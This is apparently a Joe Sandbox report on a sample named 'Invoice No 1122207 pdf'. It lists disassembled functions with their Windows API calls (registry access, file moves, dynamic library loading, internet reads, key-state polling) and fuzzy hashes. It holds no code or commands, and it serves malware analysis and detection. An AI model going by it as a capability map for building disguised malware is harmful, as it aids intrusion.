Instruction Fuzzy Hash: 4F51D871D00209AFEB10EF669CC19AEB7B8EF45314B1042AFE554E72A1EB74DD418BD8

Function 0047E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0047DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0047CF22,?), ref: 0047DDFD

Part of subcall function 0047DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0047CF22,?), ref: 0047DE16

Part of subcall function 0047E199: GetFileAttributesW.KERNEL32(?,0047CF95), ref: 0047E19A

lstrcmpiW.KERNEL32(?,?), ref: 0047E473
MoveFileW.KERNEL32(?,?), ref: 0047E4AC
_wcslen.LIBCMT ref: 0047E5EB
_wcslen.LIBCMT ref: 0047E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0047E650

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f75f28fb4482b0fe5d15d230f9ec0de50409e961f8cc6914f0e124b507a79ff4
Instruction ID: 4a7e949fc09f8578df0285f7f958b2dc41a442f31998295e87a4b7bfad6995a5
Opcode Fuzzy Hash: f75f28fb4482b0fe5d15d230f9ec0de50409e961f8cc6914f0e124b507a79ff4
Instruction Fuzzy Hash: 8C516FB24083455BC724EBA1DC819DB73ECAF89344F004A6FE689D3151EF78A588876E

Function 0049B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 0049C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0049B6AE,?,?), ref: 0049C9B5
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049C9F1
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA68
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0049BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0049BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0049BB63
RegCloseKey.ADVAPI32(?,?), ref: 0049BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0049BBB3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 7c242a745b2dd8090a52436f753ee0ac5da3c17fabfdd4e8ff52295084672e92
Instruction ID: 5041afaf4b4e0da743bf7ef48ad0b16c2d0bc52f8bb74cfb1fbad5ef4f0e9427
Opcode Fuzzy Hash: 7c242a745b2dd8090a52436f753ee0ac5da3c17fabfdd4e8ff52295084672e92
Instruction Fuzzy Hash: B161D131208201AFC714DF14C990E6BBBE5FF84308F14896EF4998B2A2DB35ED45CB96

Function 00478BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00478BCD
VariantClear.OLEAUT32 ref: 00478C3E
VariantClear.OLEAUT32 ref: 00478C9D
VariantClear.OLEAUT32(?), ref: 00478D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00478D3B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 694fcbc8b9cf9751aef9645ff0760a301874e197b115279830d1c5d8bc83d813
Instruction ID: 70ca067523b154fdbb5e6de94d7b85697061bc555aadc03d714f56de2c1ba891
Opcode Fuzzy Hash: 694fcbc8b9cf9751aef9645ff0760a301874e197b115279830d1c5d8bc83d813
Instruction Fuzzy Hash: FC516DB5A00219DFCB10CF58D894AAABBF4FF8D314B15855AE909DB350D734E911CF94

Function 00488AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00488BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00488BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00488C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00488C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00488C5F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 4ef32150eb8ae3cf60c5998972df7b44465bfca27d80a2f0c6a61a9deebecd86
Instruction ID: a829c9f05553940ea5e42b33936484159c4767965be1b7d4bd357bd9017903e4
Opcode Fuzzy Hash: 4ef32150eb8ae3cf60c5998972df7b44465bfca27d80a2f0c6a61a9deebecd86
Instruction Fuzzy Hash: 6D515F35A00214AFCB01DF65C881AAEBBF5FF49318F08845DE849AB362DB35ED41CB94

Function 00498EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00498F40
GetProcAddress.KERNEL32(00000000,?), ref: 00498FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00498FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00499032
FreeLibrary.KERNEL32(00000000), ref: 00499052

Part of subcall function 0042F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00481043,?,761DE610), ref: 0042F6E6
Part of subcall function 0042F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0046FA64,00000000,00000000,?,?,00481043,?,761DE610,?,0046FA64), ref: 0042F70D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: f1dfa2a8af92c6f2fa23fa31397c99e199f4062d0487f0e37f120e8f4857c860
Instruction ID: ba985ac36e7d70186bcf075020540c50bf7674d1c3f7e011078ac1edfa6f5ef5
Opcode Fuzzy Hash: f1dfa2a8af92c6f2fa23fa31397c99e199f4062d0487f0e37f120e8f4857c860
Instruction Fuzzy Hash: 22512935600205DFCB11DF59C4948AEBBF1FF49358B0480AEE8169B362DB35ED86CB95

Function 004A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 004A6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 004A6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004A6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0048AB79,00000000,00000000), ref: 004A6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004A6CC7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: e4dfb80d215fe2f0abfa13afd2ae1b7df0d614a54378e2a4d9d2adce287eb267
Instruction ID: 3b4f8a48d1fb26aceece9514bb38876a1b8233be03b8539f99eeaf058a13b111
Opcode Fuzzy Hash: e4dfb80d215fe2f0abfa13afd2ae1b7df0d614a54378e2a4d9d2adce287eb267
Instruction Fuzzy Hash: 2841F635600114AFD724CF28CC84FA67FA5EB1B360F0A022AF955AB3E1C779ED41CA58

Function 00442051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004420C3
_free.LIBCMT ref: 004420E3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: daf33a5b8842fb7a8a440f6bb4683ce336f28dd3ef03a246876850ab670c2d30
Instruction ID: dbe4b12d1b5ef9a76a7b268ee01cd29a6b7b1667680eef61006dd1f4afb043e6
Opcode Fuzzy Hash: daf33a5b8842fb7a8a440f6bb4683ce336f28dd3ef03a246876850ab670c2d30
Instruction Fuzzy Hash: 56410472A002009FEB20DF79C981A5EB3F1EF88314F95416AF605EB352D6B5AD01CB84

Function 0042912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00429141
ScreenToClient.USER32(00000000,?), ref: 0042915E
GetAsyncKeyState.USER32(00000001), ref: 00429183
GetAsyncKeyState.USER32(00000002), ref: 0042919D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 23f58be605c12e13882f6a621315a3a09da15055e6934ad91cd90781d33d268a
Instruction ID: d07b7fb9b1cc10956d52b5274f51739ca756b7f87ede036128ea1593edfdff20
Opcode Fuzzy Hash: 23f58be605c12e13882f6a621315a3a09da15055e6934ad91cd90781d33d268a
Instruction Fuzzy Hash: DB417D31A0821AAADB059F69D844AFEB774FB06324F20822BE425A23D0D7785D50CB96

Function 00483874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004838CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00483922
TranslateMessage.USER32(?), ref: 0048394B
DispatchMessageW.USER32(?), ref: 00483955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00483966

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: e6b956bf743025c86a323533d8fb16062911f204e1dfbd9e1c3a221e0b9aef96
Instruction ID: cfab3a0175811c045164ca863a3fe19fea1ccd759c791dfe665831cb9672692f
Opcode Fuzzy Hash: e6b956bf743025c86a323533d8fb16062911f204e1dfbd9e1c3a221e0b9aef96
Instruction Fuzzy Hash: 4B31DAB09443819EEB35EF34D888B7B3BE8AB05B05F040D7BE452862A1D3FC9585CB19

Function 0048CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0048C21E,00000000), ref: 0048CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0048CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0048C21E,00000000), ref: 0048CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0048C21E,00000000), ref: 0048CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0048C21E,00000000), ref: 0048CFF2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 4968ddade919e78204f9b3d4d1389a895e88dcac5a1b75579c33235204e78a9c
Instruction ID: 876457f0adcaf2424fbabab0cef010281955103ad9a08f2b8f0f95e5a748d9fa
Opcode Fuzzy Hash: 4968ddade919e78204f9b3d4d1389a895e88dcac5a1b75579c33235204e78a9c
Instruction Fuzzy Hash: 5C314171504205AFEB20EFA5D8C49AF7BF9EB15354B10486FF606D2280DB38AD459B68

Function 00471901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00471915
PostMessageW.USER32(00000001,00000201,00000001), ref: 004719C1
Sleep.KERNEL32(00000000,?,?,?), ref: 004719C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 004719DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004719E2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 085d660e6e7fb3195bc34f4fdc3be1d84c6fc89de580f156c20b6a24d221a68d
Instruction ID: b81f49960a7c1050747a43b0eeea243e6d0626db0cd380daa65a4b8b37457e6a
Opcode Fuzzy Hash: 085d660e6e7fb3195bc34f4fdc3be1d84c6fc89de580f156c20b6a24d221a68d
Instruction Fuzzy Hash: C931F6B1A00219EFCB10CFACCD98ADE3BB5EB05314F008226FA25A72E0C3749D45CB94

Function 004A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 004A5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 004A579D
_wcslen.LIBCMT ref: 004A57AF
_wcslen.LIBCMT ref: 004A57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 004A5816

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: e69d7c13cfee4c0b5b5f4270a619e052e1bff7d024229b3e3a9b4c17043470eb
Instruction ID: a68b5054da3947af00bb4884a75f7ad8ccd26a7aca2bd31704d276795f5bfeb5
Opcode Fuzzy Hash: e69d7c13cfee4c0b5b5f4270a619e052e1bff7d024229b3e3a9b4c17043470eb
Instruction Fuzzy Hash: 7C21D775900608DADB20DF60CD84AEE7B7CFF16324F104117F919EA280D7789985CF59

Function 00490930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00490951
GetForegroundWindow.USER32 ref: 00490968
GetDC.USER32(00000000), ref: 004909A4
GetPixel.GDI32(00000000,?,00000003), ref: 004909B0
ReleaseDC.USER32(00000000,00000003), ref: 004909E8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 6f66b99f1474ac2ce5f3f7d840feaef23cf7908b7fcf019991c7a53eafa980e0
Instruction ID: e348afaf92aaf7ff8b2808d734d348c12d10c30eb487fb869ddea32893235637
Opcode Fuzzy Hash: 6f66b99f1474ac2ce5f3f7d840feaef23cf7908b7fcf019991c7a53eafa980e0
Instruction Fuzzy Hash: B421A175600204AFD704EF65C984AAEBBE9EF49704F00843EE84AA7362DB34AC45CB94

Function 0044CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CDE9

Part of subcall function 00443820: RtlAllocateHeap.NTDLL(00000000,?,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6,?,00411129), ref: 00443852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044CE0F
_free.LIBCMT ref: 0044CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044CE31

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 08e1ae7251d896a1960962ce4e7754ec2ea01e1cf9f5a629c3fc0d4c9517cf23
Instruction ID: e5c4b19c28e31fe9e747232f6dac4d4b5fa34164c6cd0ee705155136c413902d
Opcode Fuzzy Hash: 08e1ae7251d896a1960962ce4e7754ec2ea01e1cf9f5a629c3fc0d4c9517cf23
Instruction Fuzzy Hash: DB0175726026157F376116B76CC8D7BAD6DDAC7BA1329012AFD05C6201DF698D0291B8

Function 00429639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00429693
SelectObject.GDI32(?,00000000), ref: 004296A2
BeginPath.GDI32(?), ref: 004296B9
SelectObject.GDI32(?,00000000), ref: 004296E2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4853d94e95593719ae1833e5db8daf04a16c977158f633886e731729882d6b15
Instruction ID: 1dc2e6510d7a8b3376017f75bc0bbea1bcce5f88e2b3ab9b9b44a86e2b92b094
Opcode Fuzzy Hash: 4853d94e95593719ae1833e5db8daf04a16c977158f633886e731729882d6b15
Instruction Fuzzy Hash: 1921A1B0A42355EBDB118F64EC88BAA3BA4BF11355F500236F4109A2B2D3785C81CF9C

Function 00475711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00475726
_memcmp.LIBVCRUNTIME ref: 00475744
_memcmp.LIBVCRUNTIME ref: 00475757
_memcmp.LIBVCRUNTIME ref: 0047576F
_memcmp.LIBVCRUNTIME ref: 00475787

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7af7611d85b753bd4b00e5a3d71d25766f0c44141e088f0aad73b1a16dcb494e
Instruction ID: 95fe706676b1af874f0c5f7b09a68588c1f1f1fbdab0b9d9e0dbd6ae1940ddaf
Opcode Fuzzy Hash: 7af7611d85b753bd4b00e5a3d71d25766f0c44141e088f0aad73b1a16dcb494e
Instruction Fuzzy Hash: 200192A1641A09BAA20C55129D82FFB635C9B253A8F108037FD089EA41F7ADED1582AD

Function 00442DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0043F2DE,00443863,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6), ref: 00442DFD
_free.LIBCMT ref: 00442E32
_free.LIBCMT ref: 00442E59
SetLastError.KERNEL32(00000000,00411129), ref: 00442E66
SetLastError.KERNEL32(00000000,00411129), ref: 00442E6F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

